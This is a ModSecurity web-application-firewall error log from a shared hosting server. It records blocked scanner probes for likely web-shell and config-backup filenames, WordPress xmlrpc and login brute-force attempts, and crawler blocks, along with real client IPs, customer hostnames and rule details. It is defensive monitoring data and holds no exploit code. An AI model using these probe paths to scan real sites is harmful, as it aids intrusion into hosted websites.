[Tue May 26 13:02:21.701788 2026] [security2:error] [pid 470766:tid 470916] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMhejO_W1DqEcFHQ7uCgAAABQ"]
[Tue May 26 13:02:22.722110 2026] [security2:error] [pid 470766:tid 470981] [client 4.201.75.230:5369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVMhujO_W1DqEcFHQ7uLgAAAFU"]
[Tue May 26 13:02:22.840262 2026] [security2:error] [pid 470766:tid 470913] [client 104.43.242.179:45021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/wander.php"] [unique_id "ahVMhujO_W1DqEcFHQ7uLwAAABE"]
[Tue May 26 13:02:22.840392 2026] [security2:error] [pid 470766:tid 470913] [client 104.43.242.179:45021] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/wander.php"] [unique_id "ahVMhujO_W1DqEcFHQ7uLwAAABE"]
[Tue May 26 13:02:24.678310 2026] [security2:error] [pid 470766:tid 470928] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMiOjO_W1DqEcFHQ7uUwAAACA"]
[Tue May 26 13:02:26.149710 2026] [security2:error] [pid 470766:tid 470977] [client 104.43.242.179:44951] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/gptsh.php"] [unique_id "ahVMiujO_W1DqEcFHQ7ugQAAAFE"]
[Tue May 26 13:02:26.149848 2026] [security2:error] [pid 470766:tid 470977] [client 104.43.242.179:44951] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/gptsh.php"] [unique_id "ahVMiujO_W1DqEcFHQ7ugQAAAFE"]
[Tue May 26 13:02:27.068231 2026] [security2:error] [pid 470766:tid 470991] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMiujO_W1DqEcFHQ7ukAAAAF8"]
[Tue May 26 13:02:27.648482 2026] [security2:error] [pid 470766:tid 470990] [client 104.43.242.179:45051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/xocx.php"] [unique_id "ahVMi-jO_W1DqEcFHQ7upwAAAF4"]
[Tue May 26 13:02:27.648577 2026] [security2:error] [pid 470766:tid 470990] [client 104.43.242.179:45051] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/xocx.php"] [unique_id "ahVMi-jO_W1DqEcFHQ7upwAAAF4"]
[Tue May 26 13:02:28.926037 2026] [security2:error] [pid 470766:tid 470944] [client 157.20.138.61:60249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMjOjO_W1DqEcFHQ7uzAAAADA"]
[Tue May 26 13:02:28.926180 2026] [security2:error] [pid 470766:tid 470944] [client 157.20.138.61:60249] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMjOjO_W1DqEcFHQ7uzAAAADA"]
[Tue May 26 13:02:29.092425 2026] [security2:error] [pid 470766:tid 470969] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMjOjO_W1DqEcFHQ7uxQAAAEk"]
[Tue May 26 13:02:29.342656 2026] [security2:error] [pid 470766:tid 470958] [client 4.201.75.230:5347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-includes/IXR/test1.php"] [unique_id "ahVMjejO_W1DqEcFHQ7u2QAAAD4"]
[Tue May 26 13:02:30.458710 2026] [security2:error] [pid 470766:tid 470926] [client 104.43.242.179:45053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/155.php"] [unique_id "ahVMjujO_W1DqEcFHQ7u-AAAAB4"]
[Tue May 26 13:02:30.458819 2026] [security2:error] [pid 470766:tid 470926] [client 104.43.242.179:45053] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/155.php"] [unique_id "ahVMjujO_W1DqEcFHQ7u-AAAAB4"]
[Tue May 26 13:02:31.891807 2026] [security2:error] [pid 470766:tid 470991] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMj-jO_W1DqEcFHQ7vEwAAAF8"]
[Tue May 26 13:02:33.715220 2026] [security2:error] [pid 470766:tid 470969] [client 74.7.244.59:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVMkejO_W1DqEcFHQ7vSgAAAEk"]
[Tue May 26 13:02:33.728289 2026] [security2:error] [pid 470766:tid 471017] [client 74.7.244.59:60358] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.preetishah.moes-art.com"] [uri "/robots.txt"] [unique_id "ahVMkejO_W1DqEcFHQ7vRwAAeUo"]
[Tue May 26 13:02:34.341806 2026] [security2:error] [pid 470766:tid 470903] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMkejO_W1DqEcFHQ7vVAAAAAc"]
[Tue May 26 13:02:34.514528 2026] [security2:error] [pid 470766:tid 470945] [client 4.201.75.230:5352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-includes/js/crop/cropper.php"] [unique_id "ahVMkujO_W1DqEcFHQ7vZAAAADE"]
[Tue May 26 13:02:36.724999 2026] [security2:error] [pid 470766:tid 471015] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMlOjO_W1DqEcFHQ7voQAAAHc"]
[Tue May 26 13:02:36.891541 2026] [security2:error] [pid 470766:tid 471019] [client 14.191.51.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMlOjO_W1DqEcFHQ7vpwAAAHs"]
[Tue May 26 13:02:37.261895 2026] [security2:error] [pid 470766:tid 470853] [remote 123.30.233.13:39010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVMlejO_W1DqEcFHQ7vvwAASFY"]
[Tue May 26 13:02:38.851525 2026] [security2:error] [pid 470766:tid 470988] [client 104.43.242.179:44937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/colay.php"] [unique_id "ahVMlujO_W1DqEcFHQ7v-wAAAFw"]
[Tue May 26 13:02:38.851646 2026] [security2:error] [pid 470766:tid 470988] [client 104.43.242.179:44937] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/colay.php"] [unique_id "ahVMlujO_W1DqEcFHQ7v-wAAAFw"]
[Tue May 26 13:02:39.503631 2026] [security2:error] [pid 470766:tid 470978] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMl-jO_W1DqEcFHQ7wAQAAAFI"]
[Tue May 26 13:02:39.538359 2026] [security2:error] [pid 470766:tid 470952] [client 157.20.138.61:60607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMl-jO_W1DqEcFHQ7wHgAAADg"]
[Tue May 26 13:02:39.538491 2026] [security2:error] [pid 470766:tid 470952] [client 157.20.138.61:60607] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMl-jO_W1DqEcFHQ7wHgAAADg"]
[Tue May 26 13:02:40.879478 2026] [security2:error] [pid 470766:tid 470794] [remote 94.76.235.103:42154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVMmOjO_W1DqEcFHQ7wRAAAPBs"]
[Tue May 26 13:02:41.825658 2026] [security2:error] [pid 470766:tid 470997] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMmejO_W1DqEcFHQ7wVgAAAGU"]
[Tue May 26 13:02:42.133993 2026] [security2:error] [pid 470766:tid 470911] [client 4.201.75.230:5922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/app.php"] [unique_id "ahVMmujO_W1DqEcFHQ7wdQAAAA8"]
[Tue May 26 13:02:43.394661 2026] [security2:error] [pid 470766:tid 470951] [client 104.22.123.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com.whitesun.in"] [uri "/index.php"] [unique_id "ahVMmejO_W1DqEcFHQ7wYQAAADc"]
[Tue May 26 13:02:43.554848 2026] [security2:error] [pid 470766:tid 470982] [client 84.37.38.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVMmujO_W1DqEcFHQ7wkAAAAFY"]
[Tue May 26 13:02:44.096994 2026] [security2:error] [pid 470766:tid 470991] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMm-jO_W1DqEcFHQ7wtgAAAF8"]
[Tue May 26 13:02:44.371512 2026] [security2:error] [pid 470766:tid 470902] [client 4.201.75.230:5205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/bootstrap.php"] [unique_id "ahVMnOjO_W1DqEcFHQ7wzgAAAAY"]
[Tue May 26 13:02:48.571477 2026] [security2:error] [pid 470766:tid 471017] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMoOjO_W1DqEcFHQ7xNgAAAHk"]
[Tue May 26 13:02:48.741152 2026] [security2:error] [pid 470766:tid 470839] [remote 94.76.235.103:42166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVMoOjO_W1DqEcFHQ7xTQAAVEg"]
[Tue May 26 13:02:50.195865 2026] [security2:error] [pid 470766:tid 470941] [client 157.20.138.61:60963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMoujO_W1DqEcFHQ7xdAAAAC0"]
[Tue May 26 13:02:50.195972 2026] [security2:error] [pid 470766:tid 470941] [client 157.20.138.61:60963] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMoujO_W1DqEcFHQ7xdAAAAC0"]
[Tue May 26 13:02:50.271293 2026] [security2:error] [pid 470766:tid 470862] [remote 167.71.132.111:39778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.132.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVMoujO_W1DqEcFHQ7xbwAABF8"]
[Tue May 26 13:02:52.938200 2026] [security2:error] [pid 470766:tid 470973] [client 4.201.75.230:5198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/config-backup.php"] [unique_id "ahVMpOjO_W1DqEcFHQ7x1AAAAE0"]
[Tue May 26 13:02:53.336315 2026] [security2:error] [pid 470766:tid 470927] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMpOjO_W1DqEcFHQ7x0wAAAB8"]
[Tue May 26 13:02:55.073748 2026] [security2:error] [pid 470766:tid 470997] [client 104.43.242.179:45018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/hly.php"] [unique_id "ahVMp-jO_W1DqEcFHQ7yGQAAAGU"]
[Tue May 26 13:02:55.073871 2026] [security2:error] [pid 470766:tid 470997] [client 104.43.242.179:45018] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/hly.php"] [unique_id "ahVMp-jO_W1DqEcFHQ7yGQAAAGU"]
[Tue May 26 13:02:56.392714 2026] [security2:error] [pid 470766:tid 470926] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMp-jO_W1DqEcFHQ7yLAAAAB4"]
[Tue May 26 13:02:56.973975 2026] [security2:error] [pid 470766:tid 470897] [client 4.201.75.230:6083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/config.php"] [unique_id "ahVMqOjO_W1DqEcFHQ7yUwAAAAE"]
[Tue May 26 13:02:58.262465 2026] [security2:error] [pid 470766:tid 470903] [client 210.1.247.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMqujO_W1DqEcFHQ7yfQAAAAc"], referer: https://www.anujtradingco.com/
[Tue May 26 13:02:58.693937 2026] [security2:error] [pid 470766:tid 470977] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMqujO_W1DqEcFHQ7yggAAAFE"]
[Tue May 26 13:02:58.712706 2026] [security2:error] [pid 470766:tid 471010] [client 4.201.75.230:6082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/g.php"] [unique_id "ahVMqujO_W1DqEcFHQ7ymgAAAHI"]
[Tue May 26 13:03:00.280197 2026] [security2:error] [pid 470766:tid 471004] [client 185.191.171.1:59630] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVMrOjO_W1DqEcFHQ7yzQAAAGw"]
[Tue May 26 13:03:00.280368 2026] [security2:error] [pid 470766:tid 471004] [client 185.191.171.1:59630] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVMrOjO_W1DqEcFHQ7yzQAAAGw"]
[Tue May 26 13:03:00.739109 2026] [security2:error] [pid 470766:tid 470965] [client 210.1.247.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMrOjO_W1DqEcFHQ7y4wAAAEU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1433169&moderation-hash=2dd70b96af24a4ea7a7a058125fbb5eb
[Tue May 26 13:03:00.938775 2026] [security2:error] [pid 470766:tid 470915] [client 157.20.138.61:61320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMrOjO_W1DqEcFHQ7y8wAAABM"]
[Tue May 26 13:03:00.938897 2026] [security2:error] [pid 470766:tid 470915] [client 157.20.138.61:61320] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMrOjO_W1DqEcFHQ7y8wAAABM"]
[Tue May 26 13:03:01.152676 2026] [security2:error] [pid 470766:tid 470995] [client 146.174.166.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMrOjO_W1DqEcFHQ7y5gAAAGM"]
[Tue May 26 13:03:01.160091 2026] [security2:error] [pid 470766:tid 471015] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMrOjO_W1DqEcFHQ7y6QAAAHc"]
[Tue May 26 13:03:01.225514 2026] [security2:error] [pid 470766:tid 470953] [client 74.7.244.52:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahVMrejO_W1DqEcFHQ7zAAAAADk"]
[Tue May 26 13:03:01.226230 2026] [security2:error] [pid 470766:tid 470901] [client 74.7.244.52:40222] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahVMrejO_W1DqEcFHQ7y_gAABWo"]
[Tue May 26 13:03:03.556025 2026] [security2:error] [pid 470766:tid 470934] [client 4.201.75.230:6118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahVMr-jO_W1DqEcFHQ7zTAAAACY"]
[Tue May 26 13:03:04.529346 2026] [security2:error] [pid 470766:tid 470904] [client 4.201.75.230:6084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/init.php"] [unique_id "ahVMsOjO_W1DqEcFHQ7zbAAAAAg"]
[Tue May 26 13:03:05.171162 2026] [security2:error] [pid 470766:tid 471020] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMsOjO_W1DqEcFHQ7zdgAAAHw"]
[Tue May 26 13:03:05.393816 2026] [security2:error] [pid 470766:tid 470896] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMsOjO_W1DqEcFHQ7zeQAAAAA"]
[Tue May 26 13:03:05.675144 2026] [security2:error] [pid 470766:tid 470935] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMsejO_W1DqEcFHQ7zjgAAACc"], referer: https://www.anujtradingco.com/
